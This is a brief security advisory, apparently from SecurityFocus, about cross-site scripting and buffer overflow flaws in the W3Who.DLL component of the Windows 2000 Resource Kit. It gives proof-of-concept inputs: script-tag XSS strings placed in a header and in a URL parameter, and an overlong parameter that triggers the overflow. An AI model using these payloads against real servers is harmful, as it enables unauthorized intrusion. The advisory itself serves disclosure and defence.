Microsoft Windows 2000 Resource Kit W3Who.DLL Multiple Remote Vulnerabilities

The following proof of concept exploits have been made available:

XSS vulnerability when displaying HTTP headers :
Connection: keep-alive<script>alert("Hello")</script>

XSS vulnerability in error message :
http://www.example.com/scripts/w3who.dll?bogus=<script>alert("Hello")</script>

Buffer overflow when called with long parameters :
http://www.example.com/scripts/w3who.dll?AAAAAAAAA...[519 to 12571]....AAAAAAAAAAAAA

An exploit for the w3who.dll buffer overflow has been released as part of the MetaSploit Framework 2.3.


 

Privacy Statement
Copyright 2010, SecurityFocus